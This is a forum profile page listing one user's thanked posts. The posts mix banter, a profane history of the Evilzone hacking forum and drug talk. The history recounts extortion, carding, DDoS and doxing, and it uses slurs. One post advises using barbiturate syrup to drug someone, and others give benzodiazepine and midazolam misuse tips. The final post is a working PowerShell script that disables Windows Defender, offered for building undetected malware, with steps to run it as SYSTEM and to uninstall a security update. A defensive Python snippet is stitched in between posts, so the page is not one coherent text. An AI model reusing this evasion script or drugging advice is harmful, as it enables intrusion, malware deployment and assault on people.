Thanked Posts by Sophie

  1. Sophie Pedophile Tech Support
    Originally posted by aldra anyone know if epoxy resin (or fibreglass resin I guess) needs air to cure or if I can just pour it in an enclosed space and forget about it

    It's the chemical reaction between the two compounds that does the hardening (IIRC). It is however an exothermic reaction so if you're going to let it set in an enclosed space you might want to pull a vacuum on it first.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. Sophie Pedophile Tech Support
    Originally posted by Kafka I’m completely fine cutting off anyone who is anti-abortion or feminism and if that turns out to be a majority of people here or you’re up to another sinister plot to sway me it will only drive me away.

    Ah yes, my go to, sinister plots to change people's political opinions.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. Sophie Pedophile Tech Support
    Its founder was a Totse member you know.

    Here is the story if you're interested.

    A brief history of Evilzone

    Evilzone: A place of lulz, a place of trolls. It had everything, snitches, bitches, and nigger hitches. This story will be my account of Evilzone up until the present day. The dates and events may not be 100% accurate but I intend to retell this epic story like no other can… Just because, some things shouldn't be forgotten.


    Totse Era: ? - 2006
    By tracing our old founder's alias' [redacted] we come across a slew of activity which occurred around 2006. What was gone and thought forgotten is forgotten no longer, and hence we have a rare window into the mind that founded Evilzone. This tale begins at Totse . . .

    Totse
    If you don't know about Totse then I probably hate you, nevertheless I do feel a certain urgency to fill you in . . . Ah yes, Totse! Such great memories indeed; Totse was a wonderful community and all those who were a part of it can tell you it was something special. The Temple of The Screaming electron, as it was called, was a place of openness, revolution, and free speech. Notable boards included Better Living Through Chemistry (drugs), Bad Ideas (fraud), and for some of us Hacking & Security – which is where I first met our founder, who I will now dub “N.”


    Totse was the first thing that would come up when you searched for “bomb making” in Google, and they were damn proud of it too. It was a community of outcasts and as a community they weren't very welcoming to newcomers. Anyone who asked stupid questions was socially castrated, idiots and noobs weren't tolerated… Totse, in many respects, was a place just for the elite. It wasn't the kind of place open to helping people learn… like Evilzone was.


    Totse operated from 1989 to 2009. Its closing was a great loss to the Internet; Its community and culture annihilated with the fragmentation of its then legendary website. Many would later mourn the loss of such a great website, and shun the idiotic disorganization of its closing, including yours truly… and though I resented such events, I never thought I would be a part of similar occurrences with the staff of Evilzone, years later… A fact I'm both sad and embarrassed to announce.


    . . . and some things that should not have been forgotten were lost. History became legend. Legend became myth. And Totse passed out of all knowledge . . .


    A look at N
    2006 and Totse was still going strong. I decide to trace a then young N to gain some insight into his thought process and how Evilzone came to be founded. Here is what I found out.


    . . .


    For N's young age [redacted] he was a remarkably intelligent and curious person. We often forget that English wasn't his mother tongue… He seems to have picked up English, possibly just by talking to other hackers on the net. In addition to English, he spoke two other languages fluently and knew the basics of two more, including Greek.


    His access to information was quite extraordinary. He knew all the best places to pick up things for free and enjoyed listening to lectures on a wide variety of subjects ranging from hacking to philosophy. It was his deep and genuine love of learning and curiosity that saw him become the hacker he is today. His ability to teach himself was one of his greatest strengths, something most hackers have in common.


    The problem with the kids today is they don't undertake or understand autodidacticism. They've grown up in a society where what little they know is pre-chewed and tasteless ;) N was a stark contrast to the norm; Completely independent and capable of schooling himself in the esoteric art of the electron. N even chose his religion at a young age – when most kids are just going along with what their family believes – N was an Atheist, even in a society and culture where he was bullied for being so.


    It's interesting to see the posts here about September 11, 2006. He was discussing whether or not 9/11 was an inside job. This was almost directly after it happened, there wasn't any band wagon yet, and the kid was still in school… yet he was already questioning, already thinking, at such a young age. While most Americans were busy taking George Bush' cock up their ass, N was attacking it with a sword. That kind of inquisitiveness and wit pervades his thinking. It is not surprising to find the boy interested in conspiracy theories and alternative views. Not in a crazy way, either – Something hard to find in that kind of scene.


    Amongst this old data I find references to N being considerably older than he would otherwise have us believe. I consider this data and discard it; N was arrested not long ago, his official age was reported as 18, all other data supports my conclusions. Hence it was a lie, possibly so he could enter communities requiring him to be 18 years or older. He would do so many more times.


    Of course, this wouldn't be the first time N would do something dishonest or immoral, for he was a notorious scammer . . .


    N would hack websites and ask the owner to pay for the backups. Then he would place deface pages on them, advertising his hacking services (for a cost, of course.) From there, I can only assume people contacted him, and he would then trick them into installing a remote access tool. This allowed him to harvest credit card numbers which could be used for online purchases; He was certainly crafty.


    This was the darker side of N, he loved scamming and fraud and worshiped the famous con artists. He lists here as his favorite movie “The Italian Job.” Not surprising, really.


    N's small success at fraud was his doorway to the larger world of finance, both legitimate and illegitimate. N has been said by many to be “a financial genius” and in 2006 this is where it all began; He was heavily interested in finance. Some may even say obsessed. The web is testament to that, and it's littered with N's early attempts to make money.


    I speculate that the only reason N started Evilzone was for the money. There is evidence suggesting he planned to make money from it via advertising but that never went anywhere because no advertising networks would have accepted a hacking website. That is also the reason why Evilzone doesn't have ads on it now.

    Hacker's Heaven


    Hacker's Heaven was the precursor to the Evilzone we all know and love today. It had a mono-chrome green look and feel with flaming text and a dizzying array of trojans, worms, viruses, root-kits, and tutorials to choose from. The closest analogy I have to Hacker's Heaven is the Vxchaos File Server… those who have seen this server will know what I mean.


    Hacker's Heaven wasn't very popular and there isn't much to say about it. I don't know when exactly it was started, and all evidence of its existence has been mostly erased from the web.

    Evilzone.net Era: 2006 – 11 April 2007


    Enter Evilzone.net; Evilzone.net was the start of a series of chain reactions that year which would later place Evilzone amongst some of the top hacking websites of the day. Our main characters here include Evil.!0 and N. Evil.!0 was N's vague friend and he was also the original owner of Evilzone.net. N convinced Evil.!0 to use Evilzone.net for a hacking forum, and so began the legacy.




    I first heard about Evilzone.net myself from a post on Totse. Something about that post intrigued me, so I decided to check out the forum and registered. At once, I was amazed by what was there. A whole board was dedicated exclusively to so called “freebies.” Freebies included anything and everything N felt like giving away and often this was r00t access to web servers. This place was wonderful, I thought, and so I gained access to my first “shell” there. These shells were impressive because you could literally do anything you could imagine to the web server. You could upload an email bomber, a proxy, create a DoS script, back door the website for accounts, host a botnet, anything you imagined, and N had hacked hundreds of websites and given away the shells all for free.


    That was my first impression of Evilzone and it marked the start of the most epic marketing campaign for a website I think I've ever encountered…


    Most people neglect to tell the story of how Evilzone became popular but to miss that is to do the story a great injustice, so I'd like to retell it: N had been hacking website after website, many of them high traffic, and posting backlinks to Evilzone. He was seeding promotional torrents, creating YouTube videos, spamming forums, chat rooms, email accounts… spreading worms… press releases… and the members were all doing the same. In short, it was the most aggressive marketing campaign I've ever seen, and it worked alarmingly well. By the end of 2007, Evilzone.net had more than 100,000 posts with hundreds of new members joining everyday.


    Evilzone in those days was more black hat than anything you can possibly imagine. The members talked about credit card numbers so much that the term had to be shortened to “CCs” for convenience. Carding and fraud were a part of the culture, and so the freebies board found itself swimming with CCs. Every hacker was thrilled to be a part of Evilzone, the only “hacking” website where any hacking actually took place. Indeed, it was this blatant disregard for all laws that made Evilzone so great in the first place. You truly felt like literally nothing was off-limits – that's not to say you still wouldn't get banned for posting CP though.


    Those were the glory days of Evilzone where it was still in the Goldilocks zone of not being so large as to gather the FBI's attention, yet not being so small that there was never anything going on. It was perfect, but perfect never lasts.


    For one reason or another, N began to fight with Evil.!0, and they became enemies. The drama that marked this period was a wave file N released allegedly of Evil.!0 saying “Hello, my name is Evil.!0 and niggers fuck my ass and I am gay.” This was mass sent to every user on the forum (which was a considerable number of people at the time.)


    … Which was the catalyst for the first great coup d'état in Evilzone history (though certainly not the last ;) ) – The hijacking of .Net to .Org.


    The great coup: 11 April 2007 – 2008


    One of the most turbulent eras in Evilzone history was the move to hijack Evilzone.net's user-base to Evilzone.org. N had initiated this coup over frustrations he held regarding Evilzone's management. I believe it might have been something like losing the main database due to unreliable hosting which set him off.


    N's plan was essentially to lure all the old members to the new website with shiny new toys. The server was to be faster, with more bandwidth. There would be a dedicated torrent tracker, radio station, IRC server, and more. As any user will know, it is not the forum but the community which counts, and N was arguably the most important part of that community… With N now gone, I went after him like most people. Not because I was a sheep but because he was my friend. I didn't much like Evil.!0 anyway. He was never really a part of Evilzone, and didn't post much (if at all.)


    I remember distinctly that Evilzone.net wasn't doing too well at this point. Possibly we had been DDoSed and encountered extended downtime. I recall it was kind of dead in the end. We were spamming Evilzone.net to bring new members to the website but there was nobody left to hear it…


    Evilzone.org had to start from scratch, as far as marketing was concerned, and this time N was more aggressive and determined than ever. N, having already demonstrated his genius for marketing, enlisted his members to advertise on money, graffiti on walls, and tag websites in the name of Evilzone. Eventually, Evilzone.org ranked at the top of Progenics – a self-styled top 100 for hacking websites and a key target for recruitment.


    N had achieved his goal, but N was the kind of guy who held grudges and he obsessively pursued anyone who had fucked with him over these past long years. The first he got even with was Evil.!0. He managed to turn the whole community against him. Evil.!0's reign was now over, and nobody was ever going back to Evilzone.net now, or Evil.!0, in fact… they couldn't, it was impossible – N had DDoSed Evilzone.net. The last of their users were therefore forced to give up, and reluctantly flocked to the new website.


    Thus the coup had been successful, but its backlash would be felt for years to come. You see, the takeover had angered many individuals. In the hacker world, this is extremely bad. Even in war you have the concept of mutually assured destruction or MAD but the two Evilzones knew of no such concept. They were quite content to destroy themselves and anyone who was unfortunate enough to be caught in the cross-fire, and I believe one such member was H)(40R (that spells “haxor”, sir! (I couldn't read it then, lol).)


    H)(40R was one of the stars of Evilzone. He was VIP, he posted useful content, seemed to know his shit, and was willing to help people. I liked the guy, and we were friends… I don't know what the fuck happened but H)(40r ended up snitching on Evilzone to the FBI. His email account had been hacked by N which uncovered irrefutable correspondence between him and the Feds. Understandably, this enraged N, and a fire burned inside of him.


    He enlisted my support, and together we fucked H)(40R in novel ways. I believe we got his Internet account shut down, and his house was raided. I don't recall, but one thing was sure: H)(40R, like Evil.!0, was now universally hated by Evilzone and was not coming back now, even if he wanted to. He later DDoSed Evilzone….


    At this point, I'd like to apologize for a lack of citations, dates, and what not. Over time, much of the data has been destroyed in the conflict and all that remains are sketchy memories but I think if we collaborate, we can construct a more concrete history.


    Following this point, another notable event occurred: The raiding of fellow member Xeross. Xeross was another star member of Evilzone and was also VIP. His house was raided by the Swedish Police when an Evilzone user uploaded some bad data to his server. I don't have any more info than that, unfortunately.


    Let us also not forget the lulzy release of the Evilzone album by Odin, AKA “Cyberneticxmasghost” (“Yes, I'm a girl Sir :3”.) In this album, Odin chronicled the snitching of H)(40R in his hit song “Snitcher.” I am guessing from the lack of other tangible evidence that this drama was all that occurred from 2007 – 2008. Thus concludes the year.


    Betrayals and lulz: 2008 – 2009


    The stage is now set for Evilzone.org and its up and coming stars are:
    N – Founder of Evilzone. N is skilled at hacking, marketing, fraud, and finance. Administrator of Evilzone and loved by all.

    Joepie91 – One of the great coders of Evilzone. Joepie91 is a homosexual Dutch man who codes in C#. Joepie91 was then a friendly and laid back guy, with many friends, but over the years has become sharp and jaded. Was once a black hat, now is an activist for open source.

    Bubzuru – One of the great coders of Evilzone and universally respected for his great software. Creator of EvilVNC, Bubzuru Binder, Bubzuru Crypt, and countless other great software. Bubzuru is a skilled hacker and codes in a slew of languages including Borland C++, and X86 ASM.
    Xzid – Notable assembly expert. One of the great coders of Evilzone. Like the former two, Xzid was respected and could be classed as 1337. He was a friend of mine but left Evilzone early on to return recently.
    Cyberneticxmasghost – Lulzy hacker resembling The Joker. Odin was Evilzone's resident musician and created countless new original content. He is a skilled singer, artist, and hacker. He understands the way of chaos and lulz unlike most new to the art.
    Satan911 – Current administrator of Evilzone. Satan911 is a veteran black hat who had many successful and noteworthy intrusions in the early days. His cracking skills were commended and provided the majority of the database dumps in freebies.
    Ande – Current administrator of Evilzone. To be honest, I don't really remember that much about ande in those days. He's perhaps most known today for his take over of Evilzone. A strange turn of events, really.
    Shwack13 – The biggest script kiddie of Evilzone. Doesn't know any programming languages. He can't even code HTML.
    Dark Coke – Another cracker type. Together with Satan911 they dropped more DB's than your mum sucking cocks on a busy street corner.
    HoaX – Good at doxing and haxing. Evilzone VIP.
    Jmscobera - The god of porn.
    hacker@sr.gov.yt– Blackhat with countless intrusions and the 1337 email to prove it. This guy has been around forever.
    Hanorotu – Deserves an honorable mention. Back in the day we experimented with sleep deprivation to see what would happen.
    Turkish OG – Some faggot who DdoSed Evilzone.
    Stathis – Former Administrator of Evilzone. Stathis was really cool and he knew a lot about security and hacking but he was more the sysadmin type.
    Fox – My closet friend :3 He was then known by another name but I don't recall.

    Stateofhack – Former Totse elite and member of the Totse Phoenix. Stateofhack is moderator on Zoklet.
    Roenhayden – Another Totse user. I don't know what happened to him, but he knew more about hacking, security, and chemistry than anyone I've ever met.
    &T – One of the administrator who came from Totse.


    And anyone I just can't remember!




    To be continued….

    I need clarifications on the below events:


    H)(40R – Snitches on Evilzone to the FBI.
    Turkish_OG - DdoS' Evilzone
    ViraL – ViraL AKA Ryan Cleary, alleged member of Lulzsec joins Evilzone through Odin.
    Shwack13 - “Hacks” Evilzone, dumps the database, psychopain killer.
    ? - Singletrackworld fiasco.
    Joepie leaves to start null nation
    ViraL – DdoS us
    Sirholms – Suicide hoax
    Ande



    A look at Evilzone today
    It's hard to believe it's only been 6 years since this all started. Since then, a lot has changed. The website has undergone revision after revision, changes in staff, membership, and constant conflict to reach the point it's at now. We see Satan911, and Ande, along with Kulverstukas have stuck with Evilzone and are the current administrators.


    I haven't really been following much but . . . I see originally, Ande pushed to try to transition Evilzone from its dark days into a legitimate security community. All of us thought originally, that this was the best move. It was reasoned that for Evilzone to continue to exist it needed to change from its old ways into a more whitehat community. Not realizing, of course, that for this to occur also implied the necessary destruction of Evilzone which is the reason why so few members remain.


    I have witnessed Ande's remarkably stupid decisions and indecisiveness in running this place. I am basing this on the following events:


    Close forum.
    Open blog
    Decide forum was actually good
    Reopen forum
    No that actually sucked, close forum again, IRC is 1337
    Decide to open forum again
    No, open new hacking community, Evilzone sucks
    Close it, it actually sucked
    Herp fucking derp, I wish I was joking

    If I didn't know any better, I'd say Ande was trying to kill Evilzone on purpose, I suggest he may be suffering from a stroke here. But I guess, that's just the way it is. As retarded as it is, it's human nature for us to think that we're competent when we're not. It's obvious Evilzone had no choice but to die when the wrong leader took control.


    It is my opinion that Ande lacks the necessary skill and drive to run Evilzone. True, I may never have liked Ande much. In fact, I don't think a person with such poor English skills is fit to run an English website by definition, but that doesn't bias me from stating facts. The fact of the matter is, N was one of few people capable of keeping the website prosperous, even in such turmoil. Ande on the other hand, lacks the necessary skills. This is evident by the website's current decline.


    I wonder if he has even tried to promote the website once since he took over? This isn't field of dreams, people aren't going to come just because it's here, and I certainly don't think they will stay with Ande as the Administrator (lol, no offense, free speech man.)


    … and so, that brings us back to present day Evilzone, where I have no choice but to watch the website I once loved die… all because of petty pride and incompetence. You can ban me if you like, the truth is, you know I'm right and Ande should be embarrassed at the state of things. I know I would be.



    Thanks for reading.

    And that's the end of that.
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. Sophie Pedophile Tech Support
    Originally posted by CandyRein Do you often wake up and think about strangers online defeating you ?

    It consumes him on a day to day basis.
    The following users say it would be alright if the author of this post didn't die in a fire!
  5. Sophie Pedophile Tech Support
    On topic:I've calmed down, which usually makes me stop and think for a second and go: Maybe i shouldn't end this person, or: Maybe i shouldn't set fire to a block of houses because there is one person i want torched living there. And sometimes: Maybe i shouldn't be standing here inconspicuously getting a feel for an area and note this person's routine for use at a later date.

    I am however going to send a message and he is not going to like it. Everything has been meticulously prepared.
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. Sophie Pedophile Tech Support
    Originally posted by lockedin Best: Sudo, Sophie, Nile, aldra, mmQ

    Worst: G0llum, Spectral, Speedy, Hikki, WellHung, Polecat, stl1

    I'd substitute my handle with yours in that list. I also kinda like troon even though he thinks i'm spawn of the devil. But that's ok. Like Sudo who'd shoot me IRL if he could. But he's just a likeable person.

    Hikki is a suicide or a mass shooting waiting to happen. If i were a betting man, i'd put money on self delete.

    The other people you mentioned i don't particularly dislike as people i dislike their shtick. But stl1 has no redeeming qualities.


    Shout out to Richard Burnish. And of course; got murder on my mind 24/7, bless, bless, to all my niggas up in heaven,
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. Sophie Pedophile Tech Support
    Originally posted by Kafka You can keep your assumptions because you’ll never get to know me.

    You're easy to figure out.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. Sophie Pedophile Tech Support
    Public/Private key pairs. You get a set: one public key, one private key. Read about key pairs. Also a website is open, but the point is that only the operator has full access to read and to write to their website.

    It's fundamentals, but you need to understand them.
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. Sophie Pedophile Tech Support
    My mom thought having a kid with my dad was a good idea. Lol. Lmao.
    The following users say it would be alright if the author of this post didn't die in a fire!
  10. Sophie Pedophile Tech Support
    I don't care about your well being.
    The following users say it would be alright if the author of this post didn't die in a fire!
  11. Sophie Pedophile Tech Support
    Originally posted by SBTlauien It doesn't take much info. Just a phone number and 'maybe' the name on the account. Usually they want an email address that they can access using this phone number via a One-Time-Passcode. Any other accounts they can access using this phone number would work.

    They usually find out what mobile carrier is being used, call one of the local stores and social engineer a Rep into swapping that phones service to another phone. They call the mobile carrier directly and change it as well.

    Once they have control of the phone number, they can then use it to reset passwords.

    At my job, if we send someone a passcode to their phone, and they confirm it, they are authenticated to the highest. I work for a bank.

    Got it. Find out how your number keeps popping up on their radar. Also this gave me an idea for the blue team. You could probably honeypot these people by strategically leaking certain numbers tied to a special operations center, basically a couple servers simulating the kind of access they are after. Stick and carrot them to keep them around long enough to see if and when they fuck up.
    The following users say it would be alright if the author of this post didn't die in a fire!
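
An added example, not part of either post above: one way a defender could act on the two ideas in this exchange, refusing to treat an SMS one-time passcode as strong authentication shortly after the phone number changed SIM or carrier, and treating any passcode activity on deliberately leaked decoy numbers as hostile. The event fields, the carrier SIM-change feed, the 72-hour window and all phone numbers are constructed assumptions.

```python
from bisect import bisect_right
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed policy: an SMS OTP is not trusted for this long after a SIM change.
COOLING_OFF = timedelta(hours=72)

# Constructed decoy numbers: leaked on purpose, tied to no real customer.
DECOY_NUMBERS = {"+12025550199"}

# Constructed carrier feed: (phone number, time the SIM or carrier changed).
SIM_CHANGES = [
    ("+12025550143", "2024-03-01T09:15:00"),
    ("+12025550143", "2024-05-10T22:40:00"),
    ("+12025550171", "2023-11-02T12:00:00"),
]

# Constructed auth log: sensitive actions confirmed with an SMS passcode.
OTP_EVENTS = [
    {"id": "e1", "number": "+12025550143", "time": "2024-05-11T01:05:00",
     "action": "password_reset"},
    {"id": "e2", "number": "+12025550171", "time": "2024-05-11T08:30:00",
     "action": "wire_transfer"},
    {"id": "e3", "number": "+12025550199", "time": "2024-05-11T09:00:00",
     "action": "password_reset"},
    {"id": "e4", "number": "+12025550143", "time": "2024-05-10T20:00:00",
     "action": "password_reset"},
]


def build_sim_index(changes):
    """Map each number to a sorted list of its SIM-change timestamps."""
    index = defaultdict(list)
    for number, stamp in changes:
        index[number].append(datetime.fromisoformat(stamp))
    for times in index.values():
        times.sort()
    return index


def classify(event, sim_index, decoys=DECOY_NUMBERS, window=COOLING_OFF):
    """Return 'decoy_hit', 'hold' or 'allow' for one OTP-confirmed event."""
    if event["number"] in decoys:
        # Nobody legitimate owns a decoy, so any use of it is an alert.
        return "decoy_hit"
    when = datetime.fromisoformat(event["time"])
    times = sim_index.get(event["number"], [])
    # Latest SIM change at or before the event; later changes do not count.
    pos = bisect_right(times, when)
    if pos and when - times[pos - 1] <= window:
        # Number changed hands recently: require a non-SMS factor instead.
        return "hold"
    return "allow"


def triage(events, changes):
    """Classify every event and return {event id: verdict}."""
    sim_index = build_sim_index(changes)
    return {event["id"]: classify(event, sim_index) for event in events}


if __name__ == "__main__":
    for event_id, verdict in triage(OTP_EVENTS, SIM_CHANGES).items():
        print(event_id, verdict)
```
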
  12. Sophie Pedophile Tech Support
    Originally posted by Sudo Yeah and he's got a country wide warrant but he has a family member who is in a position of trust with a sports team who likely helped him flee the country. I met him before and got snakey vibes off him and I feel like my friend knew too. I saw my friend 24-36 hours before he died and he said he wasn't hanging with him anymore and wasn't going to the town he ended up dying in. I hate that butterfly effect feeling where the smallest thing could have changed the finality of someone's existence. There should be a name for that feeling. Jimi hendrix syndrome or something

    It's called survivor's guilt. And there was no way for you to tell the future. It happens a lot to loved ones of someone that ends up committing suicide. They think: If only i had listened better. If i only had said this one thing. The thing is, sometimes this is just the way things go, no matter what you say, no matter what you do. And The Past has past.
    The following users say it would be alright if the author of this post didn't die in a fire!
  13. Sophie Pedophile Tech Support
    Originally posted by Bradley Ya benzos are

    Most of them are lipophilic i seem to recall. Meaning they like to dissolve in fats and oils and such. Having a particulate suspension of a solid does not equal dissolved. It dissolves okay in ethanol AKA likkah, if you got vodka, warm it up not over an open flame ya dingus in the microwave. When it's not quite toasty but getting there it will dissolve benzos reasonably well.
    The following users say it would be alright if the author of this post didn't die in a fire!
  14. Sophie Pedophile Tech Support
    If you're gonna roofy someone might as well use barbiturates, a lot of them come as a syrup preparation already. Makes for more precise volumetric dosing as well, which is essential because barbs will kill a person.
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. Sophie Pedophile Tech Support
    You were supposed to be the chosen one, America. Shining city on the hill, bastion of liberty and all that. Look at you now, just look at the absolute fucking state.
    The following users say it would be alright if the author of this post didn't die in a fire!
  16. Sophie Pedophile Tech Support
    You could honestly just rack a line. People say benzos don't have any bioavailability intranasally but people say a lot of things and they'd be wrong.

    In any case like when you sublingual it the binder is the component that will slow absorption. One time i had these ampules of Midazolam and i really don't like to IV because for one i hate needles and i will most likely overshoot the vein first time. So unless it's morphine ampules, it's not worth it for me. but i wasn't not going to take the Midazolam.

    I ended up drawing the solution into a syringe and blasting all of it straight into the mucous membranes of my nose. And it surprised me how fast it hit.
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. Sophie Pedophile Tech Support
    Originally posted by aldra if you like Korean stuff I thought The Kingdom was pretty good, medieval zombie period piece

    also Mindhunter, detailing the FBI's first forays into investigating serial killers, I just wish they made more of it

    Yee, i really liked Mindhunter too. Something that stuck out to me is the dude they cast to be Ed Kemper, if you showed me an out of context picture of the dude and asked who's that i'd swear it'd be Ed Kemper.

    Also they were building up big time for BTK to be the big bad next season, but the next season never came.


    Haunting of Hill House was pretty cool, the scares and spooks were alright but funeral episode was a more refined sort of horror. Dunno if you've seen it, but that episode sticks out in my mind not for how scary it was, it just made me feel really uncomfortable, it was the opposite of fun. But in a good way.
    The following users say it would be alright if the author of this post didn't die in a fire!
  18. Sophie Pedophile Tech Support
    That's right it's another issue of Sophie's Cyber Shenanigans[Anti Telemetry(Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.


    Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.

    However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.

    If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
    Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.

    Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.

    ##-!NOTICE!-##
    # You may want to give this a look over if you simply want to maim
    # not kill Windows Defender

    Write-Host "[+]If you don't know what you're doing, stop executing this script." -f 'gre'
    Read-Host "If you do know, press any key to continue..." -f 'gre'

    try {
    New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft'-Name "Windows Defender" -Force -ea 0 | Out-Null
    # Pretty self explanatory
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # This is the kind of shit Windows gets up to when it thinks you're idling
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Spynet? No, doesn't seem suspicious to me guvner, honest
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Windows assumes consent, don't touch my freaking samples bro. Not cool
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # No one needs to know...
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # These features can die in a fire, look it over in case you'd like to comment
    # out some lines if you wanna play it safe, i like living on the edge
    if (-Not ((GetWmiObject -class Win32 OperatingSystem).Version -eq "6.1.7601")) {
    Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
    Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRealTimeMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -EnableControlledFolderAcces Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -EnablenetworkProtection AuditMode -Force -ea 0 | Out-Null
    Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -SubmitSampleConsent NeverSend -Force -ea 0 | Out-Null
    Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
    }
    } catch {
    Write-Warning "Failed to disable Windows Defender component"
    }

    # If this errors out you either don't have the right permissions or the service has already been stopped
    try {
    Get-Service WinDefend | Stop-Service -Force
    Set-itemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -name "Start" -Value 4 -Type DWORD -Force

    } catch {
    Write-Warning "Failed to disable WinDefend Service"

    }


    Make a text file and paste the code block. Save it as something like windef.ps1.

    I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that(Kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this


    schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System


    Change the details as necessary.

    If you want to take this a step further save the following as a .bat file and run it as administrator. This script was a part of the original ensemble i had in a previous anti-telemetry thread


    @ECHO OFF
    SETLOCAL

    echo Uninstalling updates relevant to telemetry ops
    echo Delete KB2902907 (Microsoft Security Essentials)
    start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart

    echo Delete KB3022345 (telemetry)
    start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart

    echo Delete KB3068708 (telemetry)
    start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart

    echo Delete KB3080149 (Telemetry)
    start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart


    In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.

    Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.

    Here's my implementation of a HTTP server in powershell.

    # PowerShell RegEdit and HTTP Server
    $registryPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\"

    $Name = "EnableLegacyAutoProxyFeatures"

    $value = "1"

    # Check to see if an entry exists and set value
    # If it doesn't create the appropriate subkey
    if(!(Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    else {
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    # Http Server
    $http = [System.Net.HttpListener]::new()

    # Listen at 8080
    $http.Prefixes.Add("http://localhost:8080/")

    # Start the Http Server
    $http.Start()


    # Confirm
    if ($http.IsListening) {
    write-host " HTTP Server Listening " -f 'gre'
    write-host " Please direct Windows Auto Proxy Config to http://127.0.0.1:8080/ " -f 'gre'
    }


    # Server Loop
    while ($http.IsListening) {

    $context = $http.GetContext()

    if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {

    # Log to terminal
    write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'gre'

    # Get proxy.pac data
    # Don't forget to change this to reflect the situation at your end
    [string]$data = Get-Content "C:\some\path\proxy.pac" -Raw

    # Field the request
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
    $context.Response.ContentLength64 = $buffer.Length
    $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
    $context.Response.OutputStream.Close() # Close

    }

    # End of server loop
    }


    Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.

